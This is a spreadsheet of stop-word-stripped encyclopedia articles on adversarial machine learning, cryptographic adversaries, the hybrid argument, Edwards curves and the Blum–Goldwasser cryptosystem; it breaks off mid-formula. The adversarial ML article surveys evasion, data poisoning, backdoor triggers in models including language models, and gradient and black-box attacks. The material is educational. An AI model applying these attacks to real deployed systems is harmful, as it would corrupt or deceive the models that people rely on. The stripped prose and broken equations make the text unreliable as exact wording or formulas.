realm hackers, written directed kevin anderson, (film australia, 2002, minutes).[3]e-zines: reprint article hacker revelled spotlight, court told (the age, august 1993) phrack. reference risks digest article york times, april 1990, arrest hackers. references external links crimes legislation amendment 1989 dealing offences relating computers</t>
  </si>
  <si>
    <t>Adversarial machine learning</t>
  </si>
  <si>
    <t>adversarial machine learning study attacks machine learning algorithms, defenses attacks. recent survey exposes fact practitioners report dire need better protecting machine learning systems industrial applications.to understand, note machine learning techniques mostly designed work specific problem sets, assumption training test data generated statistical distribution (iid). however, assumption often dangerously violated practical high-stake applications, users purposely supply fabricated data violates statistical assumption. some common threat models adversarial machine learning include evasion attacks, data poisoning attacks, byzantine attacks model extraction. history 2004, nilesh dalvi others noted linear classifiers used spam filters could defeated simple "evasion attacks" spammers inserted "good words" spam emails. (around 2007, spammers added random noise fuzz words within "image spam" order defeat ocr-based filters.) 2006, marco barreno others published "can machine learning secure?", outlining broad taxonomy attacks. late 2013 many researchers continued hope non-linear classifiers (such support vector machines neural networks) might robust adversaries, battista biggio others demonstrated first gradient-based attacks machine-learning models (2012-2013). 2012, deep neural networks began dominate computer vision problems; starting 2014, christian szegedy others demonstrated deep neural networks could fooled adversaries, using gradient-based attack craft adversarial perturbations.recently, observed adversarial attacks harder produce practical world different environmental constraints cancel effect noises. example, small rotation slight illumination adversarial image destroy adversariality. addition, researchers google brain's nicholas frosst point much easier make self-driving cars miss stop signs physically removing sign itself, rather creating adversarial examples. frosst also believes adversarial machine learning community incorrectly assumes models trained certain data distribution also perform well completely different data distribution. suggests approach machine learning explored, currently working unique neural network characteristics similar human perception state approaches.while adversarial machine learning continues heavily rooted academia, large tech companies google, microsoft, begun curating documentation open source code bases allow others concretely assess robustness machine learning models minimize risk adversarial attacks. examples examples include attacks spam filtering, spam messages obfuscated misspelling "bad" words insertion "good" words; attacks computer security, obfuscating malware code within network packets modifying characteristics network flow mislead intrusion detection; attacks biometric recognition fake biometric traits exploited impersonate legitimate user; compromise users' template galleries adapt updated traits time. researchers showed changing one-pixel possible fool deep learning algorithms. others printed turtle texture engineered make google's object detection classify rifle regardless angle turtle viewed. creating turtle required low-cost commercially available printing technology.a machine-tweaked image shown look like computers humans. 2019 study reported humans guess machines classify adversarial images. researchers discovered methods perturbing appearance stop sign autonomous vehicle classified merge speed limit sign.mcafee attacked tesla's former mobileye system, fooling driving speed limit, simply adding two-inch strip black tape speed limit sign.adversarial patterns glasses clothing designed deceive facial-recognition systems license-plate readers, niche industry "stealth streetwear".an adversarial attack neural network allow attacker inject algorithms target system. researchers also create adversarial audio inputs disguise commands intelligent assistants benign-seeming audio; parallel literature explores human perception stimuli.clustering algorithms used security applications. malware computer virus analysis aims identify malware families, generate specific detection signatures. attack modalities taxonomy attacks (supervised) machine learning algorithms categorized along three primary axes: influence classifier, security violation specificity. classifier influence: attack influence classifier disrupting classification phase. this preceded exploration phase identify vulnerabilities. attacker's capabilities might restricted presence data manipulation constraints. security violation: attack supply malicious data gets classified legitimate. malicious data supplied training cause legitimate data rejected training. specificity: targeted attack attempts allow specific intrusion/disruption. alternatively, indiscriminate attack creates general mayhem.this taxonomy extended comprehensive threat model allows explicit assumptions adversary's goal, knowledge attacked system, capability manipulating input data/system components, attack strategy. this taxonomy extended include dimensions defense strategies adversarial attacks. strategies below commonly encountered attack scenarios: data poisoning poisoning consists contaminating training dataset. given learning algorithms shaped training datasets, poisoning effectively reprogram algorithms. serious concerns raised especially user-generated training data, e.g. content recommendation natural language models, especially given ubiquity fake accounts. measure scale risk, suffices note facebook reportedly removes around billion fake accounts year. fact, data poisoning reported leading concern industrial applications.on social medias, disinformation campaigns known produce vast amounts fabricated activities bias recommendation moderation algorithms, push certain content others. particular case data poisoning called backdoor attack, aims teach specific behavior inputs given trigger, e.g. small defect images, sounds, videos texts. instance, intrusion detection systems (idss) often re-trained using collected data. attacker poison data injecting malicious samples operation subsequently disrupt retraining. byzantine attacks machine learning scaled, often relies multiple computing machines. federated learning, instance, edge devices collaborate central server, typically sending gradients model parameters. however, devices deviate expected behavior, e.g. harm central server's model bias algorithms towards certain behaviors (e.g., amplifying recommendation disinformation content). hand, training performed single machine, model vulnerable failure machine, attack machine; machine single point failure. fact, machine owner insert provably undetectable backdoors.the current leading solutions make (distributed) learning algorithms provably resilient minority malicious (a.k.a. byzantine) participants based robust gradient aggregation rules. nevertheless, context heterogeneous honest participants, users different consumption habits recommendation algorithms writing styles language models, provable impossibility theorems robust learning algorithm guarantee. evasion evasion attacks consist exploiting imperfection trained model. instance, spammers hackers often attempt evade detection obfuscating content spam emails malware. samples modified evade detection; classified legitimate. this involve influence training data. clear example evasion image-based spam spam content embedded within attached image evade textual analysis anti-spam filters. another example evasion given spoofing attacks biometric verification systems.evasion attacks generally split different categories: black attacks white attacks. model extraction model extraction involves adversary probing black machine learning system order extract data trained this cause issues either training data model sensitive confidential. example, model extraction could used extract proprietary stock trading model adversary could financial benefit. extreme case, model extraction lead model stealing, corresponds extracting sufficient amount data model enable complete reconstruction model. hand, membership inference targeted model extraction attack, infers owner data point, often leveraging overfitting resulting poor machine learning practices. concerningly, sometimes achievable even without knowledge access target model's parameters, raising security concerns models trained sensitive data, including limited medical records and/or personally identifiable information. with emergence transfer learning public accessibility many state machine learning models, tech companies increasingly drawn create models based public ones, giving attackers freely accessible information structure type model used. specific attack types there large variety different adversarial attacks used machine learning systems. many work deep learning systems well traditional machine learning models svms linear regression. high level sample attack types include: adversarial examples trojan attacks backdoor attacks model inversion membership inference adversarial examples adversarial example refers specially crafted input designed look "normal" humans causes misclassification machine learning model. often, form specially designed "noise" used elicit misclassifications. below current techniques generating adversarial examples literature means exhaustive list). gradient-based evasion attack fast gradient sign method (fgsm) projected gradient descent (pgd) carlini wagner (c&amp;w) attack adversarial patch attack black attacks black attacks adversarial machine learning assumes adversary outputs provided inputs knowledge model structure parameters. case, adversarial example generated either using model created scratch, without model (excluding ability query original model). either case, objective attacks create adversarial examples able transfer black model question. square attack square attack introduced 2020 black evasion adversarial attack based querying classification scores without need gradient information. score based black attack, adversarial approach able query probability distributions across model output classes, access model itself. according paper's authors, proposed square attack required less queries compared state score based black attacks time.to describe function objective, attack defines classifier {\textstyle f:[0,1]^{d}\rightarrow \mathbb ^{k}} {\textstyle representing dimensions input {\textstyle total number output classes. {\textstyle f_{k}(x)} returns score probability input {\textstyle belongs class {\textstyle allows classifier's class output input {\textstyle defined {\textstyle argmax_{k=1,...,k}f_{k}(x)} goal attack follows: {\displaystyle argmax_{k=1,...,k}f_{k}({\hat {x}})\neq y,||{\hat {x}}-x||_{p}\leq \epsilon {\text{ }}{\hat {x}}\in [0,1]^{d}} words, finding perturbed adversarial example {\textstyle {\hat {x}}} classifier incorrectly classifies class constraint {\textstyle {\hat {x}}} {\textstyle similar. paper defines loss {\textstyle {\textstyle l(f({\hat {x}}),y)=f_{y}({\hat {x}})-\max _{k\neq y}f_{k}({\hat {x}})} proposes solution finding adversarial example {\textstyle {\hat {x}}} solving constrained optimization problem: s.t. {\displaystyle \min _{{\hat {x}}\in [0,1]^{d}}l(f({\hat {x}}),y),{\text{ s.t. }}||{\hat {x}}-x||_{p}\leq \epsilon result theory adversarial example highly confident incorrect class also similar original image. find example, square attack utilizes iterative random search technique randomly perturb image hopes improving objective function. step, algorithm perturbs small square section pixels, hence name square attack, terminates soon adversarial example found order improve query efficiency. finally, since attack algorithm uses scores gradient information, authors paper indicate approach affected gradient masking, common technique formerly used prevent evasion attacks. hopskipjump attack this black attack also proposed query efficient attack, relies solely access input's predicted output class. words, hopskipjump attack require ability calculate gradients access score values like square attack, require model's class prediction output (for given input). proposed attack split different settings, targeted untargeted, built general idea adding minimal perturbations leads different model output. targeted setting, goal cause model misclassify perturbed image specific target label (that original label). untargeted setting, goal cause model misclassify perturbed image label original label. attack objectives follows {\textstyle original image, {\textstyle x^{\prime adversarial image, {\textstyle distance function images, {\textstyle c^{*}} target label, {\textstyle model's classification class label function: targeted: subject {\displaystyle {\textbf {targeted:}}\min _{x^{\prime }}d(x^{\prime },x){\text{ subject }}c(x^{\prime })=c^{*}} untargeted: subject {\displaystyle {\textbf {untargeted:}}\min _{x^{\prime }}d(x^{\prime },x){\text{ subject }}c(x^{\prime })\neq c(x)} solve problem, attack proposes following boundary function {\textstyle untargeted targeted setting: (untargeted) (targeted) {\displaystyle s(x^{\prime }):={\begin{cases}max_{c\neq c(x)}{f(x^{\prime })_{c}}-f(x^{\prime })_{c(x)},&amp;{\text{(untargeted)}}\\f(x^{\prime })_{c^{*}}-max_{c\neq c^{*}}{f(x^{\prime })_{c}},&amp;{\text{(targeted)}}\end{cases}}} this simplified better visualize boundary different potential adversarial examples: (untargeted) (targeted) {\displaystyle s(x^{\prime })&gt;0\iff {\begin{cases}argmax_{c}f(x^{\prime })\neq c(x),&amp;{\text{(untargeted)}}\\argmax_{c}f(x^{\prime })=c^{*},&amp;{\text{(targeted)}}\end{cases}}} with boundary function, attack follows iterative algorithm find adversarial examples {\textstyle x^{\prime given image {\textstyle satisfies attack objectives. initialize {\textstyle point {\textstyle s(x)&gt;0} iterate boundary search gradient update compute gradient find step sizeboundary search uses modified binary search find point boundary defined {\textstyle intersects line {\textstyle {\textstyle x^{\prime next step involves calculating gradient {\textstyle update original {\textstyle using gradient pre-chosen step size. hopskipjump authors prove iterative algorithm converge, leading {\textstyle point right along boundary close distance original image.however, since hopskipjump proposed black attack iterative algorithm requires calculation gradient second iterative step (which black attacks access to), authors propose solution gradient calculation requires model's output predictions alone. generating many random vectors directions, denoted {\textstyle u_{b}} approximation gradient calculated using average random vectors weighted sign boundary function image {\textstyle x^{\prime }+\delta _{u_{b}}} {\textstyle \delta _{u_{b}}} size random vector perturbation: {\displaystyle \nabla s(x^{\prime },\delta )\approx {\frac {1}{b}}\sum _{b=1}^{b}\phi (x^{\prime }+\delta _{u_{b}})u_{b}} result equation gives close approximation gradient required step iterative algorithm, completing hopskipjump black attack. white attacks white attacks assumes adversary access model parameters able labels provided inputs. fast gradient sign method (fgsm) first proposed attacks generating adversarial examples proposed google researchers goodfellow, jonathon shlens, christian szegedy. attack called fast gradient sign method, consists adding linear amount in-perceivable noise image causing model incorrectly classify this noise calculated multiplying sign gradient respect image want perturb small constant epsilon. epsilon increases, model likely fooled, perturbations become easier identify well. shown equation generate adversarial example {\textstyle original image, {\textstyle \epsilon small number, {\textstyle \delta _{x}} gradient function, {\textstyle loss function, {\textstyle \theta model weights, {\textstyle true label. {\displaystyle adv_{x}=x+\epsilon \cdot sign(\delta _{x}j(\theta ,x,y))} important property equation gradient calculated respect input image since goal generate image maximizes loss original image true label {\textstyle traditional gradient descent (for model training), gradient used update weights model since goal minimize loss model ground truth dateset. fast gradient sign method proposed fast generate adversarial examples evade model, based hypothesis neural networks cannot resist even linear amounts perturbation input. carlini wagner (c&amp;w) effort analyze existing adversarial attacks defenses, researchers university california, berkeley, nicholas carlini david wagner 2016 propose faster robust method generate adversarial examples.the attack proposed carlini wagner begins trying solve difficult non-linear optimization equation: subject {\displaystyle \min(||\delta ||_{p}){\text{ subject }}c(x+\delta )=t,x+\delta [0,1]^{n}} here objective minimize noise {\textstyle \delta added original input {\textstyle machine learning algorithm {\textstyle predicts original input delta {\textstyle x+\delta class {\textstyle however instead directly equation, carlini wagner propose using function {\textstyle that: {\displaystyle c(x+\delta )=t\iff f(x+\delta )\leq this condenses first equation problem below: subject {\displaystyle \min(||\delta ||_{p}){\text{ subject }}f(x+\delta )\leq 0,x+\delta [0,1]^{n}} even equation below: {\displaystyle \min(||\delta ||_{p}+c\cdot f(x+\delta )),x+\delta [0,1]^{n}} carlini wagner propose function place {\textstyle using {\textstyle function determines class probabilities given input {\textstyle when substituted equation thought finding target class confident next likeliest class constant amount: {\displaystyle f(x)=([\max _{i\neq t}z(x)_{i}]-z(x)_{t})^{+}} when solved using gradient descent, equation able produce stronger adversarial examples compared fast gradient sign method also able bypass defensive distillation, defense proposed effective adversarial examples. defenses researchers proposed multi-step approach protecting machine learning. threat modeling formalize attackers goals capabilities respect target system. attack simulation formalize optimization problem attacker tries solve according possible attack strategies. attack impact evaluation countermeasure design noise detection (for evasion based attack) information laundering alter information received adversaries (for model stealing attacks) mechanisms number defense mechanisms evasion, poisoning, privacy attacks proposed, including: deep neural network (dnn) classifiers enhanced data augmentation gans, secure learning algorithms byzantine-resilient algorithms multiple classifier systems ai-written algorithms. explore training environment; example, image recognition, actively navigating environment rather passively scanning fixed images. privacy-preserving learning ladder algorithm kaggle-style competitions game theoretic models sanitizing training data adversarial training backdoor detection algorithms also pattern recognition fawkes (image cloaking software) references external links mitre atlas: adversarial threat landscape artificial-intelligence systems nist 8269 draft: taxonomy terminology adversarial machine learning nips 2007 workshop machine learning adversarial environments computer security alfasvmlib adversarial label flip attacks support vector machines laskov, pavel; lippmann, richard (2010). "machine learning adversarial environments". machine learning. (2): 115–119. doi:10.1007/s10994-010-5207-6. s2cid 12567278. dagstuhl perspectives workshop "machine learning methods computer security" workshop artificial intelligence security, (aisec) series</t>
  </si>
  <si>
    <t>Adversary (cryptography)</t>
  </si>
  <si>
    <t>cryptography, adversary (rarely opponent, enemy) malicious entity whose prevent users cryptosystem achieving goal (primarily privacy, integrity, availability data). adversary's efforts might take form attempting discover secret data, corrupting data system, spoofing identity message sender receiver, forcing system downtime. actual adversaries, opposed idealized ones, referred attackers. former term predominates cryptographic latter computer security literature. eve, mallory, oscar trudy adversarial characters widely used types texts. this notion adversary helps intuitive formal reasoning cryptosystems casting security analysis cryptosystems 'game' users centrally co-ordinated enemy. notion security cryptosystem meaningful respect particular attacks (usually presumed carried particular sorts adversaries). there several types adversaries depending capabilities intentions presumed have. adversaries computationally bounded unbounded (i.e. terms time storage resources), eavesdropping byzantine (i.e. passively listening actively corrupting data channel), static adaptive (i.e. fixed changing behavior), mobile non-mobile (e.g. context network security)and actual security practice, attacks assigned adversaries often seen, notional analysis merely theoretical. successful adversary breaking system measured advantage. adversary's advantage difference adversary's probability breaking system probability system broken simply guessing. advantage specified function security parameter. also threat model operations security references</t>
  </si>
  <si>
    <t>Hybrid argument (Cryptography)</t>
  </si>
  <si>
    <t>cryptography, hybrid argument proof technique used show distributions computationally indistinguishable. formal description formally, show distributions computationally indistinguishable, define sequence hybrid distributions ..., polynomial security parameter define advantage probabilistic efficient (polynomial-bounded time) algorithm {\displaystyle {\mathsf {adv}}_{h_{i},h_{i+1}}^{\mathsf {dist}}(\mathbf ):=\left|\pr[x{\stackrel {\$}{\gets }}h_{i}:\mathbf (x)=1]-\pr[x{\stackrel {\$}{\gets }}h_{i+1}:\mathbf (x)=1]\right|,} dollar symbol denotes sample element distribution random. triangle inequality, clear probabilistic polynomial time algorithm {\displaystyle {\mathsf {adv}}_{d_{1},d_{2}}^{\mathsf {dist}}(\mathbf )\leq \sum _{i=0}^{t-1}{\mathsf {adv}}_{h_{i},h_{i+1}}^{\mathsf {dist}}(\mathbf thus must exist s.t. t(n) {\displaystyle {\mathsf {adv}}_{h_{k},h_{k+1}}^{\mathsf {dist}}(\mathbf )\geq {\mathsf {adv}}_{d_{1},d_{2}}^{\mathsf {dist}}(\mathbf )/t(n).} since polynomial-bounded, algorithm show negligible advantage function distributions hi+1 every {\displaystyle \epsilon (n)\geq {\mathsf {adv}}_{h_{k},h_{k+1}}^{\mathsf {dist}}(\mathbf )\geq {\mathsf {adv}}_{d_{1},d_{2}}^{\mathsf {dist}}(\mathbf )/t(n),} immediately follows advantage distinguish distributions must also negligible. this fact gives rise hybrid argument: suffices find sequence hybrid distributions show pair computationally indistinguishable. applications hybrid argument extensively used cryptography. some simple proofs using hybrid arguments are: cannot efficiently predict next output number generator, generator pseudorandom number generator (prg). securely expand 1-bit output n-bit output. notes references dodis, yevgeniy. "introduction cryptography lecture notes" (pdf). pass, rafael. course cryptography" (pdf). fischlin, marc; mittelbach, arno. overview hybrid argument" (pdf).</t>
  </si>
  <si>
    <t>Edwards curve</t>
  </si>
  <si>
    <t>mathematics, edwards curves family elliptic curves studied harold edwards 2007. concept elliptic curves finite fields widely used elliptic curve cryptography. applications edwards curves cryptography developed daniel bernstein tanja lange: pointed several advantages edwards form comparison well known weierstrass form. definition equation edwards curve field characteristic {\displaystyle x^{2}+y^{2}=1+dx^{2}y^{2}\,} scalar {\displaystyle d\in k\setminus \{0,1\}} also following form parameters called edwards curve: {\displaystyle x^{2}+y^{2}=c^{2}(1+dx^{2}y^{2})\,} cd(1 c4·d) every edwards curve birationally equivalent elliptic curve weierstrass form, thus admits algebraic group chooses point serve neutral element. finite, sizeable fraction elliptic curves written edwards curves. often elliptic curves edwards form defined c=1, without loss generality. following sections, assumed c=1. group (see also weierstrass curve group law) every edwards curve {\displaystyle x^{2}+y^{2}=1+dx^{2}y^{2}} field characteristic equal {\displaystyle d\neq birationally equivalent elliptic curve field: {\displaystyle (1/e)v^{2}=u^{3}+(4/e-2)u^{2}+u} {\displaystyle e=1-d,u={\frac {1+y}{1-y}},v={\frac {2(1+y)}{x(1-y)}}} point {\displaystyle p=(0,1)} mapped infinity this birational mapping induces group edwards curve. edwards addition elliptic curve points given rational expression coordinates points, although general need several formulas cover possible pairs. edwards curve, taking neutral element point points {\displaystyle (x_{1},y_{1})} {\displaystyle (x_{2},y_{2})} given formula {\displaystyle (x_{1},y_{1})+(x_{2},y_{2})=\left({\frac {x_{1}y_{2}+x_{2}y_{1}}{1+dx_{1}x_{2}y_{1}y_{2}}},{\frac {y_{1}y_{2}-x_{1}x_{2}}{1-dx_{1}x_{2}y_{1}y_{2}}}\right)\,} opposite point {\displaystyle (x,y)} {\displaystyle (-x,y)} point {\displaystyle (0,-1)} order points {\displaystyle (\pm 1,0)} order particular, edwards curve always point order coordinates square {\displaystyle \{(x_{1},y_{1}),(x_{2},y_{2})\}\in \{(x,y)|x^{2}+y^{2}=1+dx^{2}y^{2}\}^{2}} exceptional points: denominators {\displaystyle 1+dx_{1}x_{2}y_{1}y_{2}} {\displaystyle 1-dx_{1}x_{2}y_{1}y_{2}} always nonzero. therefore, edwards addition complete square this means formulas work pairs input points edwards curve exceptions doubling, exception neutral element, exception negatives, etc. words, defined pairs input points edwards curve result gives input points. square operation exceptional points, i.e. pairs points {\displaystyle (x_{1},y_{1}),(x_{2},y_{2})\in \{(x,y)|x^{2}+y^{2}=1+dx^{2}y^{2}\}} denominators becomes zero: either {\displaystyle 1+dx_{1}x_{2}y_{1}y_{2}=0} {\displaystyle 1-dx_{1}x_{2}y_{1}y_{2}=0} attractive feature edwards addition strongly unified i.e. also used double point, simplifying protection side-channel attack. addition formula faster unified formulas strong property completenessexample addition consider elliptic curve edwards form {\displaystyle {\displaystyle }x^{2}+y^{2}=1+2x^{2}y^{2}} point {\displaystyle p_{1}=(1,0)} possible prove neutral element (0,1) gives indeed, using formula given above, coordinates point given are: {\displaystyle x_{3}={\frac {x_{1}y_{2}+y_{1}x_{2}}{1+2x_{1}x_{2}y_{1}y_{2}}}=1} {\displaystyle y_{3}={\frac {y_{1}y_{2}-x_{1}x_{2}}{1-2x_{1}x_{2}y_{1}y_{2}}}=0} analogue circle understand better concept "addition" points curve, nice example given classical circle group: take circle radius {\displaystyle {\displaystyle }x^{2}+y^{2}=1} consider points p1=(x1,y1), p2=(x2,y2) angles that: {\displaystyle {\displaystyle }p_{1}=(x_{1},y_{1})=(\sin {\alpha _{1}},\cos {\alpha _{1}})} {\displaystyle {\displaystyle }p_{2}=(x_{2},y_{2})=(\sin {\alpha _{2}},\cos {\alpha _{2}})} thus, given "their angles". that point p3=p1+p2 point circle coordinates (x3,y3), where: {\displaystyle {\displaystyle }x_{3}=\sin({\alpha }_{1}+{\alpha }_{2})=\sin {\alpha }_{1}\cos {\alpha }_{2}+\sin {\alpha }_{2}\cos {\alpha }_{1}=x_{1}y_{2}+x_{2}y_{1}} {\displaystyle {\displaystyle }y_{3}=\cos({\alpha }_{1}+{\alpha }_{2})=\cos {\alpha }_{1}\cos {\alpha }_{2}-\sin {\alpha }_{1}\sin {\alpha }_{2}=y_{1}y_{2}-x_{1}x_{2}.} way, addition formula points circle radius {\displaystyle {\displaystyle }(x_{1},y_{1})+(x_{2},y_{2})=(x_{1}y_{2}+x_{2}y_{1},y_{1}y_{2}-x_{1}x_{2})} addition edwards curves points elliptic curve form abelian group: points take integer multiples single point. when elliptic curve described non-singular cubic equation, points denoted directly related third point intersection curve line passes birational mapping edwards curve corresponding cubic elliptic curve maps straight lines conic sections {\displaystyle axy+bx+cy+d=0} words, edwards curves three points {\displaystyle {\displaystyle {\displaystyle -(p+q)} hyperbola. given distinct non-identity points {\displaystyle p_{1}=(x_{1},y_{1}),p_{2}=(x_{2},y_{2}),p_{1}\neq p_{2}} coefficients quadratic form scalars): {\displaystyle a=(x_{1}-x_{2})+(x_{1}y_{2}-x_{2}y_{1})} {\displaystyle b=(x_{2}y_{2}-x_{1}y_{1})+y_{1}y_{2}(x_{2}-x_{1})} {\displaystyle c=x_{1}x_{2}(y_{1}-y_{2}),d=c} case doubling point {\displaystyle p=(x,y)} inverse point {\displaystyle -2p} lays conic touches curve point {\displaystyle coefficients quadratic form defines conic scalars): {\displaystyle a=dx^{2}y-1} {\displaystyle b=y-x^{2}} {\displaystyle c=x(1-y),d=c} projective homogeneous coordinates context cryptography, homogeneous coordinates used prevent field inversions appear affine formula. avoid inversions original edwards addition formulas, curve equation written projective coordinates {\displaystyle (x^{2}+y^{2})z^{2}=z^{4}+dx^{2}y^{2}} projective point {\displaystyle (x:y:z)} corresponds affine point {\displaystyle (x/z:y/z)} edwards curve. identity element represented {\displaystyle (0:1:1)} inverse {\displaystyle (x:y:z)} {\displaystyle (-x:y:z)} addition formula homogeneous coordinates given {\displaystyle (x_{1}:y_{1}:z_{1})+(x_{2}:y_{2}:z_{2})=(x_{3}:y_{3}:z_{3})} {\displaystyle x_{3}=z_{1}z_{2}(x_{1}y_{2}+x_{2}y_{1})(z_{1}^{2}z_{2}^{2}-dx_{1}x_{2}y_{1}y_{2})} {\displaystyle y_{3}=z_{1}z_{2}(y_{1}y_{2}-x_{1}x_{2})(z_{1}^{2}z_{2}^{2}+dx_{1}x_{2}y_{1}y_{2})} {\displaystyle z_{3}=(z_{1}^{2}z_{2}^{2}-dx_{1}x_{2}y_{1}y_{2})(z_{1}^{2}z_{2}^{2}+dx_{1}x_{2}y_{1}y_{2})} algorithm addition points edwards curve could computed efficiently extended edwards form {\displaystyle (x:y:z:t)} {\displaystyle t=xy/z} {\displaystyle (x_{3}:y_{3}:z_{3}:t_{3})=(x_{1}:y_{1}:z_{1}:t_{1})+(x_{2}:y_{2}:z_{2}:t_{2})} {\displaystyle a=x_{1}x_{2};b=y_{1}y_{2};c=dt_{1}t_{2};d=z_{1}z_{2};} {\displaystyle e=(x_{1}+y_{1})(x_{2}+y_{2})-a-b;f=d-c;g=d+c;h=b-a;} {\displaystyle x_{3}=e\cdot f;y_{3}=g\cdot h;z_{3}=f\cdot g;t_{3}=e\cdot doubling doubling performed exactly formula addition. doubling refers case inputs (x1, (x2, equal. doubling point {\displaystyle p=(x,y)} {\displaystyle {\begin{aligned}(x,y)+(x,y)&amp;=\left({\frac {2xy}{1+dx^{2}y^{2}}},{\frac {y^{2}-x^{2}}{1-dx^{2}y^{2}}}\right)\\[6pt]&amp;=\left({\frac {2xy}{x^{2}+y^{2}}},{\frac {y^{2}-x^{2}}{2-x^{2}-y^{2}}}\right)\end{aligned}}} denominators simplified based curve equation {\displaystyle x^{2}+y^{2}=1+dx^{2}y^{2}} further speedup achieved computing {\displaystyle 2xy} {\displaystyle (x+y)^{2}-x^{2}-y^{2}} this reduces cost doubling homomorphic coordinates general addition costs here field multiplications, field squarings, cost multiplying curve parameter field addition. example doublingas previous example addition law, consider edwards curve d=2: {\displaystyle x^{2}+y^{2}=1+2x^{2}y^{2}} point {\displaystyle p=(1,0)} coordinates point {\displaystyle p_{2}=2p_{1}} are: {\displaystyle x_{2}={\frac {2xy}{x^{2}+y^{2}}}=0} {\displaystyle y_{2}={\frac {y^{2}-x^{2}}{2-(x^{2}+y^{2})}}=-1} point obtained doubling thus {\displaystyle p_{2}=(0,-1)} mixed addition mixed addition case known case a=z1.z2 eliminated total cost reduces 9m+1s+1c+1d+7a algorithm z1.z2 words, z1b= z12c=x1.x2d=y1.y2e=d.c.d f=b-e g=b+e a.f((xi+y1).(x2+y2)-c-d) a.g.(d-c) z3=c.f.g tripling tripling done first doubling point adding result itself. applying curve equation doubling, obtain {\displaystyle 3(x_{1},y_{1})=\left({\frac {(x_{1}^{2}+y_{1}^{2})^{2}-(2y_{1})^{2}}{4(x_{1}^{2}-1)x_{1}^{2}-(x_{1}^{2}-y_{1}^{2})^{2}}}x_{1},{\frac {(x_{1}^{2}+y_{1}^{2})^{2}-(2x_{1})^{2}}{-4(y_{1}^{2}-1)y_{1}^{2}+(x_{1}^{2}-y_{1}^{2})^{2}}}y_{1}\right).\,} there sets formulas operation standard edwards coordinates. first costs second needs ratio small, specifically 2/3, second better larger ratios first preferred. using addition doubling formulas mentioned above) point symbolically computed 3(x1 compared example triplinggiving edwards curve d=2, point p1=(1,0), point coordinates: {\displaystyle x_{3}={\frac {(x_{1}^{2}+y_{1}^{2})^{2}-(2y_{1})^{2}}{4(x_{1}^{2}-1)x_{1}^{2}-(x_{1}^{2}-y_{1}^{2})^{2}}}x_{1}=-1} {\displaystyle y_{3}={\frac {(x_{1}^{2}+y_{1}^{2})^{2}-2(x_{1})^{2}}{-4(y_{1}^{2}-1)y_{1}^{2}+(x_{1}^{2}-y_{1}^{2})^{2}}}y_{1}=0} 3p1=(-1,0)=p-1. this result also found considering doubling example: 2p1=(0,1), (0,-1) -p1. algorithma=x12b=y12c=(2z1)2d=a+b e=d2f=2d.(a-b) g=e-b.c h=e-a.c i=f+h j=f-g x3=g.j.x1 y3=h.i.y1 z3=i.j.z1 this formula costs inverted edwards coordinates bernstein lange introduced even faster coordinate system elliptic curves called inverted edward coordinates coordinates satisfy curve y2)z2 (dz4 x2y2) corresponds affine point (z/x, z/y) edwards curve dx2y2 inverted edwards coordinates, unlike standard edwards coordinates, complete addition formulas: points, neutral element, must handled separately. addition formulas still advantage strong unification: used without change double point. information operations coordinates http://hyperelliptic.org/efd/g1p/auto-edwards-inverted.html extended coordinates edward curves there another coordinates system edwards curve represented; coordinates called extended coordinates even faster inverted coordinates. information time-cost required operations coordinates see: http://hyperelliptic.org/efd/g1p/auto-edwards.html also twisted edwards curvefor information running-time required specific case, table costs operations elliptic curves. notes references bernstein, daniel; lange, tanja (2007), faster addition doubling elliptic curves (pdf) edwards, harold april 2007), normal form elliptic curves", bulletin american mathematical society, (3): 393–422, doi:10.1090/s0273-0979-07-01153-6, issn 0002-9904 faster group operations elliptic curves, hisil, wong, carter, dawson d.j.bernstein, p.birkner. lange, c.peters, optimizing double-base elliptic-curve single-scalar multiplication (pdf){{citation}}: maint: multiple names: authors list (link) washington, lawrence (2008), elliptic curves: number theory cryptography, discrete mathematics applications (2nd ed.), chapman hall/crc, isbn 978-1-4200-7146-7 bernstein, daniel; lange, tanja, inverted edwards coordinates (pdf) external links http://hyperelliptic.org/efd/g1p/index.html http://hyperelliptic.org/efd/g1p/auto-edwards.html</t>
  </si>
  <si>
    <t>Blum–Goldwasser cryptosystem</t>
  </si>
  <si>
    <t>blum–goldwasser (bg) cryptosystem asymmetric encryption algorithm proposed manuel blum shafi goldwasser 1984. blum–goldwasser probabilistic, semantically secure cryptosystem constant-size ciphertext expansion. encryption algorithm implements xor-based stream cipher using blum-blum-shub (bbs) pseudo-random number generator generate keystream. decryption accomplished manipulating final state generator using private key, order find initial seed reconstruct keystream. cryptosystem semantically secure based assumed intractability integer factorization; specifically, factoring composite value {\displaystyle n=pq} {\displaystyle p,q} large primes. multiple advantages earlier probabilistic encryption schemes goldwasser–micali cryptosystem. first, semantic security reduces solely integer factorization, without requiring additional assumptions (e.g., hardness quadratic residuosity problem problem). secondly, efficient terms storage, inducing constant-size ciphertext expansion regardless message length. also relatively efficient terms computation, fares well even comparison cryptosystems (depending message length exponent choices). however, highly vulnerable adaptive chosen ciphertext attacks (see below). because encryption performed using probabilistic algorithm, given plaintext produce different ciphertexts time encrypted. this significant advantages, prevents adversary recognizing intercepted messages comparing dictionary known ciphertexts. operation blum–goldwasser cryptosystem consists three algorithms: probabilistic generation algorithm produces public private key, probabilistic encryption algorithm, deterministic decryption algorithm. generation public private keys generated follows: choose large distinct prime numbers {\displaystyle {\displaystyle {\displaystyle p\equiv 3{\bmod {4}}} {\displaystyle q\equiv 3{\bmod {4}}} compute {\displaystyle n=pq} .then {\displaystyle public pair {\displaystyle (p,q)} private key. encryption message {\displaystyle encrypted public {\displaystyle follows: compute block size bits, {\displaystyle h=\lfloor log_{2}(log_{2}(n))\rfloor convert {\displaystyle sequence {\displaystyle blocks {\displaystyle m_{1},m_{2},\dots ,m_{t}} block {\displaystyle bits length. select random integer {\displaystyle r&lt;n} compute {\displaystyle x_{0}=r^{2}{\bmod {n}}} {\displaystyle {\displaystyle compute {\displaystyle x_{i}=x_{i-1}^{2}{\bmod {n}}} compute {\displaystyle p_{i}=} least significant {\displaystyle bits {\displaystyle x_{i}} compute {\displaystyle c_{i}=m_{i}\oplus p_{i}} finally, compute {\displaystyle x_{t+1}=x_{t}^{2}{\bmod {n}}} .the encryption message {\displaystyle {\displaystyle c_{i}} values plus final {\displaystyle x_{t+1}} value: {\displaystyle (c_{1},c_{2},\dots ,c_{t},x_{t+1})} decryption encrypted message {\displaystyle (c_{1},c_{2},\dots ,c_{t},x)} decrypted private {\displaystyle (p,q)} follows: compute {\displaystyle d_{p}=((p+1)/4)^{t+1}{\bmod {(p-1)}}} compute {\displaystyle 